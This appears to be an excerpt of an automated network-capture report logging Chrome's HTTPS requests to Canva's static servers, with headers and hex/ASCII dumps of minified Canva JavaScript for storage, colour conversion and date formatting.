                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC1369INData Raw: 74 65 6e 65 72 28 22 62 6c 6f 63 6b 65 64 22 2c 28 29 3d 3e 7b 6c 3d 21 30 3b 67 28 45 72 72 6f 72 28 22 6f 70 65 72 61 74 69 6f 6e 20 62 6c 6f 63 6b 65 64 20 64 75 65 20 74 6f 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 22 29 29 7d 29 3b 68 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 73 75 63 63 65 73 73 22 2c 28 29 3d 3e 7b 63 6f 6e 73 74 20 6e 3d 0a 68 2e 72 65 73 75 6c 74 3b 6c 3f 6e 2e 63 6c 6f 73 65 28 29 3a 28 6e 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 76 65 72 73 69 6f 6e 63 68 61 6e 67 65 22 2c 70 3d 3e 7b 28 64 2e 43 62 61 26 26 6e 75 6c 6c 3d 3d 70 2e 6e 65 77 56 65 72 73 69 6f 6e 7c 7c 64 2e 44 62 61 26 26 6e 75 6c 6c 21 3d 70 2e 6e 65 77 56 65 72 73 69 6f 6e 29 26 26 6e 2e 63 6c 6f 73 65 28 29 7d 29 2c 66
                                                                                                                                                                                                                                                                    Data Ascii: tener("blocked",()=>{l=!0;g(Error("operation blocked due to open connections"))});h.addEventListener("success",()=>{const n=h.result;l?n.close():(n.addEventListener("versionchange",p=>{(d.Cba&&null==p.newVersion||d.Dba&&null!=p.newVersion)&&n.close()}),f
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC1369INData Raw: 7b 6e 61 6d 65 3a 61 2c 76 65 72 73 69 6f 6e 3a 31 2c 65 7a 61 3a 64 3d 3e 7b 64 3d 64 2e 63 72 65 61 74 65 4f 62 6a 65 63 74 53 74 6f 72 65 28 61 2c 7b 6b 65 79 50 61 74 68 3a 22 6b 65 79 22 7d 29 3b 69 66 28 62 29 66 6f 72 28 63 6f 6e 73 74 20 7b 6e 61 6d 65 3a 65 2c 6e 64 61 3a 66 2c 2e 2e 2e 67 7d 6f 66 20 62 29 64 2e 63 72 65 61 74 65 49 6e 64 65 78 28 65 2c 60 24 7b 22 72 65 63 6f 72 64 22 7d 2e 24 7b 66 7d 60 2c 67 29 7d 2c 7a 61 61 3a 7b 74 79 70 65 3a 31 2c 43 62 61 3a 21 30 2c 44 62 61 3a 21 30 7d 7d 29 2e 74 68 65 6e 28 64 3d 3e 7b 74 68 69 73 2e 66 79 61 3d 28 29 3d 3e 7b 74 68 69 73 2e 71 6e 61 3d 21 30 3b 74 68 69 73 2e 49 5f 3d 76 6f 69 64 20 30 7d 3b 0a 64 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 6f 73 65 22 2c 74 68
                                                                                                                                                                                                                                                                    Data Ascii: {name:a,version:1,eza:d=>{d=d.createObjectStore(a,{keyPath:"key"});if(b)for(const {name:e,nda:f,...g}of b)d.createIndex(e,`${"record"}.${f}`,g)},zaa:{type:1,Cba:!0,Dba:!0}}).then(d=>{this.fya=()=>{this.qna=!0;this.I_=void 0};d.addEventListener("close",th
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC1369INData Raw: 65 28 74 68 69 73 2e 79 71 2c 22 72 65 61 64 6f 6e 6c 79 22 2c 61 73 79 6e 63 20 62 3d 3e 28 62 3d 61 77 61 69 74 20 62 2e 67 65 74 28 61 29 29 3f 74 68 69 73 2e 64 65 73 65 72 69 61 6c 69 7a 65 28 62 2e 72 65 63 6f 72 64 29 3a 76 6f 69 64 20 30 29 7d 61 73 79 6e 63 20 64 65 6c 65 74 65 28 61 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 7a 47 2e 65 78 65 63 75 74 65 28 74 68 69 73 2e 79 71 2c 22 72 65 61 64 77 72 69 74 65 22 2c 61 73 79 6e 63 20 62 3d 3e 7b 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 3f 61 77 61 69 74 20 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 61 2e 6d 61 70 28 63 3d 3e 0a 62 2e 64 65 6c 65 74 65 28 63 29 29 29 3a 61 77 61 69 74 20 62 2e 64 65 6c 65 74 65 28 61 29 7d 29 7d 61 73 79 6e 63 20 63 6f 75 6e 74 28 29 7b 72 65 74 75 72 6e 20 74 68
                                                                                                                                                                                                                                                                    Data Ascii: e(this.yq,"readonly",async b=>(b=await b.get(a))?this.deserialize(b.record):void 0)}async delete(a){return this.zG.execute(this.yq,"readwrite",async b=>{Array.isArray(a)?await Promise.all(a.map(c=>b.delete(c))):await b.delete(a)})}async count(){return th
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC190INData Raw: 3d 61 3b 74 68 69 73 2e 45 57 61 3d 62 3b 74 68 69 73 2e 74 68 72 65 73 68 6f 6c 64 3d 31 45 34 7d 7d 3b 0a 7d 29 2e 63 61 6c 6c 28 73 65 6c 66 2c 20 73 65 6c 66 2e 5f 34 35 66 37 38 35 33 64 63 37 36 36 30 33 37 38 61 30 33 38 39 35 32 62 35 33 63 30 39 35 33 65 29 3b 7d 2c 0a 0a 2f 2a 2a 2a 2f 20 39 37 37 34 35 32 3a 0a 28 5f 2c 20 5f 5f 2c 20 72 29 20 3d 3e 20 72 28 39 31 36 34 29 0a 0a 7d 5d 29 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 73 6f 75 72 63 65 6d 61 70 73 2f 66 32 62 39 31 36 61 32 30 35 33 36 36 32 31 65 2e 6a 73 2e 6d 61 70
                                                                                                                                                                                                                                                                    Data Ascii: =a;this.EWa=b;this.threshold=1E4}};}).call(self, self._45f7853dc7660378a038952b53c0953e);},/***/ 977452:(_, __, r) => r(9164)}])//# sourceMappingURL=sourcemaps/f2b916a20536621e.js.map


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    49192.168.2.1249772104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC787OUTGET /web/a121920226a20c53.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC1189INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:39 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 9796
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59510b88ec185d-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 49979
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "b5fb8d5067f40cb9cc45ad4c09f97a47"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:25 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:20 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: JWi4ka2/z63hRS5p7vRWP0hU5dNiPeg5ea5mcriODydspF2r13qTrjDnwvf6FqaaaZ1DeCywmbw=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: HR8TSHCZD1PV8646
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: G1QLA2cFgpeq7vnU51IX7weOShdiYqEc
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC352INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 30 65 25 32 42 62 52 4b 70 33 68 4e 42 35 6b 51 4b 38 4b 72 5a 35 78 71 6d 30 64 64 25 32 46 67 42 43 66 71 32 6a 71 47 4a 55 76 39 62 6b 5a 66 38 6b 6d 36 73 43 7a 6d 6f 58 66 44 33 68 73 61 25 32 46 6f 4b 51 31 69 78 52 39 74 76 6b 67 5a 69 78 73 4e 41 64 45 64 7a 54 62 74 42 42 68 76 67 75 44 70 79 4a 6b 4a 33 4c 4e 35 43 55 47 39 61 25 32 42 4a 6c 69 5a 42 74 35 50 44 35 6d 34 67 44 49 55 66 76 69 51 55 52 59 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0e%2BbRKp3hNB5kQK8KrZ5xqm0dd%2FgBCfq2jqGJUv9bkZf8km6sCzmoXfD3hsa%2FoKQ1ixR9tvkgZixsNAdEdzTbtBBhvguDpyJkJ3LN5CUG9a%2BJliZBt5PD5m4gDIUfviQURY%3D"}],"group":"cf-nel","max_age":6048
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC1369INData Raw: 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 36 34 39 39 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 32 39 33 37 36 33 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 38 31 33 31 31 30 29 3b 73 65 6c 66 2e 5f 34
                                                                                                                                                                                                                                                                    Data Ascii: (self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[6499],{/***/ 293763:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._4
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC1369INData Raw: 34 35 2a 62 2b 2e 37 31 36 38 37 38 36 2a 63 2b 2e 30 36 30 36 31 36 39 2a 64 29 2c 31 30 30 2a 28 2e 30 31 33 39 33 32 32 2a 62 2b 2e 30 39 37 31 30 34 35 2a 63 2b 2e 37 31 34 31 37 33 33 2a 64 29 29 7d 3b 0a 5f 5f 63 2e 51 76 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 3d 4f 76 2e 24 46 61 2c 63 3d 4f 76 2e 64 33 61 2c 64 3d 4f 76 2e 63 33 61 3b 6c 65 74 20 7b 78 3a 65 2c 79 3a 66 2c 7a 3a 67 7d 3d 61 3b 65 2f 3d 62 2e 78 3b 66 2f 3d 62 2e 79 3b 67 2f 3d 62 2e 7a 3b 61 3d 66 3e 64 3f 4d 61 74 68 2e 63 62 72 74 28 66 29 3a 28 63 2a 66 2b 31 36 29 2f 31 31 36 3b 72 65 74 75 72 6e 20 6e 65 77 20 5f 5f 63 2e 50 76 28 31 31 36 2a 61 2d 31 36 2c 35 30 30 2a 28 28 65 3e 64 3f 4d 61 74 68 2e 63 62 72 74 28 65 29 3a 28 63 2a 65 2b 31 36 29 2f 31
                                                                                                                                                                                                                                                                    Data Ascii: 45*b+.7168786*c+.0606169*d),100*(.0139322*b+.0971045*c+.7141733*d))};__c.Qv=function(a){const b=Ov.$Fa,c=Ov.d3a,d=Ov.c3a;let {x:e,y:f,z:g}=a;e/=b.x;f/=b.y;g/=b.z;a=f>d?Math.cbrt(f):(c*f+16)/116;return new __c.Pv(116*a-16,500*((e>d?Math.cbrt(e):(c*e+16)/1
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC1369INData Raw: 32 30 30 3b 72 65 74 75 72 6e 20 6e 65 77 20 4d 76 28 28 67 2a 2a 33 3e 64 3f 67 2a 2a 33 3a 28 31 31 36 2a 67 2d 31 36 29 2f 63 29 2a 62 2e 78 2c 28 65 3e 63 2a 64 3f 28 28 65 2b 31 36 29 2f 31 31 36 29 2a 2a 33 3a 65 2f 63 29 2a 62 2e 79 2c 28 61 2a 2a 33 3e 64 3f 61 2a 2a 33 3a 28 31 31 36 2a 61 2d 31 36 29 2f 63 29 2a 62 2e 7a 29 7d 3b 58 76 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 5b 62 2c 63 2c 64 5d 3d 5b 61 2e 72 2f 32 35 35 2c 61 2e 67 2f 32 35 35 2c 61 2e 62 2f 32 35 35 5d 3b 61 3d 4d 61 74 68 2e 6d 69 6e 28 62 2c 63 2c 64 29 3b 63 6f 6e 73 74 20 65 3d 4d 61 74 68 2e 6d 61 78 28 62 2c 63 2c 64 29 2c 66 3d 65 2d 61 2c 67 3d 28 61 2b 65 29 2f 32 3b 72 65 74 75 72 6e 20 6e 65 77 20 5f 5f 63 2e 54 76 28 30 3d 3d 3d 66 3f 30 3a 65 3d
                                                                                                                                                                                                                                                                    Data Ascii: 200;return new Mv((g**3>d?g**3:(116*g-16)/c)*b.x,(e>c*d?((e+16)/116)**3:e/c)*b.y,(a**3>d?a**3:(116*a-16)/c)*b.z)};Xv=function(a){const [b,c,d]=[a.r/255,a.g/255,a.b/255];a=Math.min(b,c,d);const e=Math.max(b,c,d),f=e-a,g=(a+e)/2;return new __c.Tv(0===f?0:e=
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC1369INData Raw: 63 2b 62 2e 72 2a 64 2a 28 31 2d 63 29 29 2f 65 29 2c 67 3d 4d 61 74 68 2e 72 6f 75 6e 64 28 28 61 2e 67 2a 63 2b 62 2e 67 2a 64 2a 28 31 2d 63 29 29 2f 65 29 3b 61 3d 4d 61 74 68 2e 72 6f 75 6e 64 28 28 61 2e 62 2a 63 2b 62 2e 62 2a 64 2a 28 31 2d 63 29 29 2f 65 29 3b 72 65 74 75 72 6e 20 62 20 69 6e 73 74 61 6e 63 65 6f 66 20 4a 76 3f 6e 65 77 20 4a 76 28 66 2c 67 2c 61 29 3a 6e 65 77 20 5f 5f 63 2e 4b 76 28 66 2c 67 2c 61 2c 65 29 7d 3b 4a 4c 61 3d 66 75 6e 63 74 69 6f 6e 2a 28 61 29 7b 6c 65 74 20 62 3d 30 3b 66 6f 72 28 6c 65 74 20 63 3d 31 3b 63 3c 61 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 7b 63 6f 6e 73 74 20 64 3d 61 5b 63 2d 31 5d 2c 65 3d 61 5b 63 5d 3b 28 49 4c 61 2e 68 61 73 28 64 29 7c 7c 49 4c 61 2e 68 61 73 28 65 29 29 26 26 64 21 3d 3d 65 26
                                                                                                                                                                                                                                                                    Data Ascii: c+b.r*d*(1-c))/e),g=Math.round((a.g*c+b.g*d*(1-c))/e);a=Math.round((a.b*c+b.b*d*(1-c))/e);return b instanceof Jv?new Jv(f,g,a):new __c.Kv(f,g,a,e)};JLa=function*(a){let b=0;for(let c=1;c<a.length;c++){const d=a[c-1],e=a[c];(ILa.has(d)||ILa.has(e))&&d!==e&
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC1369INData Raw: 3d 64 3b 74 28 30 3c 3d 61 26 26 32 35 35 3e 3d 61 2c 22 69 6e 76 61 6c 69 64 20 72 3a 20 7b 7d 22 2c 61 29 3b 74 28 30 3c 3d 62 26 26 32 35 35 3e 3d 62 2c 22 69 6e 76 61 6c 69 64 20 67 3a 20 7b 7d 22 2c 62 29 3b 74 28 30 3c 3d 63 26 26 32 35 35 3e 3d 63 2c 22 69 6e 76 61 6c 69 64 20 62 3a 20 7b 7d 22 2c 63 29 3b 74 28 30 3c 3d 64 26 26 31 3e 3d 64 2c 22 69 6e 76 61 6c 69 64 20 61 3a 20 7b 7d 22 2c 64 29 7d 7d 3b 5f 5f 63 2e 50 76 3d 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 2c 62 2c 63 29 7b 74 68 69 73 2e 63 62 3d 61 3b 74 68 69 73 2e 61 3d 62 3b 74 68 69 73 2e 62 3d 63 3b 74 28 30 3c 3d 61 26 26 31 30 30 3e 3d 61 2c 22 7b 7d 22 2c 61 29 7d 7d 3b 5f 5f 63 2e 53 76 3d 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 2c 62 2c 63 29
                                                                                                                                                                                                                                                                    Data Ascii: =d;t(0<=a&&255>=a,"invalid r: {}",a);t(0<=b&&255>=b,"invalid g: {}",b);t(0<=c&&255>=c,"invalid b: {}",c);t(0<=d&&1>=d,"invalid a: {}",d)}};__c.Pv=class{constructor(a,b,c){this.cb=a;this.a=b;this.b=c;t(0<=a&&100>=a,"{}",a)}};__c.Sv=class{constructor(a,b,c)
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC1369INData Raw: 29 29 3a 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 5f 63 2e 53 76 3f 28 61 3d 46 4c 61 28 61 29 2c 57 76 28 47 4c 61 28 61 29 29 29 3a 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 5f 63 2e 54 76 3f 5f 5f 63 2e 52 76 28 61 29 3a 22 73 74 72 69 6e 67 22 3d 3d 3d 74 79 70 65 6f 66 20 61 3f 5f 5f 63 2e 56 76 28 61 29 3a 61 7d 73 74 61 74 69 63 20 74 6f 48 65 78 28 61 29 7b 72 65 74 75 72 6e 20 5f 5f 63 2e 59 76 2e 4e 74 28 61 29 2e 4f 7a 28 29 7d 7d 3b 0a 4f 76 3d 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 7b 24 46 61 3a 6e 65 77 20 4d 76 28 39 36 2e 34 32 2c 31 30 30 2c 38 32 2e 35 31 29 2c 64 33 61 3a 32 34 33 38 39 2f 32 37 2c 63 33 61 3a 32 31 36 2f 32 34 33 38 39 7d 29 3b 41 4c 61 3d 2f 5e 23 3f 28 5b 30 2d 39 61 2d 66 5d 7b 31 7d 29 28 5b 30 2d 39 61 2d 66
                                                                                                                                                                                                                                                                    Data Ascii: )):a instanceof __c.Sv?(a=FLa(a),Wv(GLa(a))):a instanceof __c.Tv?__c.Rv(a):"string"===typeof a?__c.Vv(a):a}static toHex(a){return __c.Yv.Nt(a).Oz()}};Ov=Object.freeze({$Fa:new Mv(96.42,100,82.51),d3a:24389/27,c3a:216/24389});ALa=/^#?([0-9a-f]{1})([0-9a-f
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC1369INData Raw: 3d 3d 3d 67 3f 22 73 68 6f 72 74 22 3a 22 6c 6f 6e 67 22 2c 73 65 70 61 72 61 74 6f 72 3a 6c 7d 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 22 6d 6d 6d 22 3a 63 61 73 65 20 22 6d 6d 6d 6d 22 3a 68 2e 70 75 73 68 28 7b 6b 69 6e 64 3a 22 6d 6f 6e 74 68 22 2c 66 6f 72 6d 61 74 3a 22 6d 6d 6d 22 3d 3d 3d 67 3f 22 73 68 6f 72 74 22 3a 22 6c 6f 6e 67 22 2c 73 65 70 61 72 61 74 6f 72 3a 6c 7d 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 22 79 79 22 3a 63 61 73 65 20 22 79 79 79 79 22 3a 68 2e 70 75 73 68 28 7b 6b 69 6e 64 3a 22 79 65 61 72 22 2c 66 6f 72 6d 61 74 3a 22 79 79 22 3d 3d 3d 67 3f 22 32 2d 64 69 67 69 74 22 3a 22 6e 75 6d 65 72 69 63 22 2c 73 65 70 61 72 61 74 6f 72 3a 6c 7d 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 22 64 22 3a 63 61 73 65 20 22 64 64 22 3a 68 2e
                                                                                                                                                                                                                                                                    Data Ascii: ===g?"short":"long",separator:l});break;case "mmm":case "mmmm":h.push({kind:"month",format:"mmm"===g?"short":"long",separator:l});break;case "yy":case "yyyy":h.push({kind:"year",format:"yy"===g?"2-digit":"numeric",separator:l});break;case "d":case "dd":h.
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC213INData Raw: 3b 6d 6d 6d 6d 3b 6d 6d 6d 3b 68 3a 6d 6d 3a 73 73 20 61 6d 2f 70 6d 3b 68 68 3a 6d 6d 20 61 6d 2f 70 6d 3b 68 20 61 6d 2f 70 6d 3b 68 68 3a 6d 6d 3b 68 68 3a 6d 6d 3a 73 73 22 2e 73 70 6c 69 74 28 22 3b 22 29 2e 6d 61 70 28 61 3d 3e 5f 5f 63 2e 41 28 5f 5f 63 2e 65 77 28 61 29 29 29 3b 0a 7d 29 2e 63 61 6c 6c 28 73 65 6c 66 2c 20 73 65 6c 66 2e 5f 34 35 66 37 38 35 33 64 63 37 36 36 30 33 37 38 61 30 33 38 39 35 32 62 35 33 63 30 39 35 33 65 29 3b 7d 0a 0a 7d 5d 29 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 73 6f 75 72 63 65 6d 61 70 73 2f 61 31 32 31 39 32 30 32 32 36 61 32 30 63 35 33 2e 6a 73 2e 6d 61 70
                                                                                                                                                                                                                                                                    Data Ascii: ;mmmm;mmm;h:mm:ss am/pm;hh:mm am/pm;h am/pm;hh:mm;hh:mm:ss".split(";").map(a=>__c.A(__c.ew(a)));}).call(self, self._45f7853dc7660378a038952b53c0953e);}}])//# sourceMappingURL=sourcemaps/a121920226a20c53.js.map


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    50192.168.2.1249773104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC1547OUTGET /chunk-batch/6adf981daf016320.js+ca6752412b124ab8.js+39a6195c40e885cb.js+d1746f2be639385d.vendor.js+e5858b9acd7eacfd.js+ac32d7d2559049fb.vendor.js+5c8428ff8946c2bc.vendor.js+8bb5c083c329cabd.vendor.js+f35481ca3aa7c0b1.vendor.js+7fa913dc41885224.js+a6f54230679b881b.js+4eea533da91b843b.js+68b4a56d49d06d5b.js+669a9c3f49529a1a.js+e0c33afc52136d6f.strings.js+f2ef215a4b1973ce.js+a4fa1dfb6c5bbab1.js+37310646f6c0cb67.js+470e84c5f0282c19.js+9020ba20c4c9bfa3.js+3153d733bc77daa7.js+916035f5f725fd3d.js+3e4a0f2f12f57b0a.js+927a6d6ab1e9b047.js+0551db2cd60e1299.js+adbadea387f83326.js+338f11e66f186039.js+2c6dd549e6f23a4d.js+4c2713f515715d55.js+14da071be375bc00.js+18acabe5ca80518c.js+5ca0a34b6e381def.js+eea9cc7d4f9eb5b6.js+2fdff918b6f47278.js+469a5a0d65ded138.js+2d9ada8959d4d1e3.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: chunk-composing.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1149INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:39 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 796858
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59510b1f70c354-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 49979
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:25 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:18 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    Timing-Allow-Origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: uonzfa1GT9wn9OmVvqIL9qBj6Lzziqrdw7XTg7E8FDfjK4QntKLPPHCTU6a8afeyHRTA5GRE6C8=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: HR8YEFT0XPV3H1FS
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: o8RsUuOogsolGqNNba4_O_uDUV0K3UMF
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
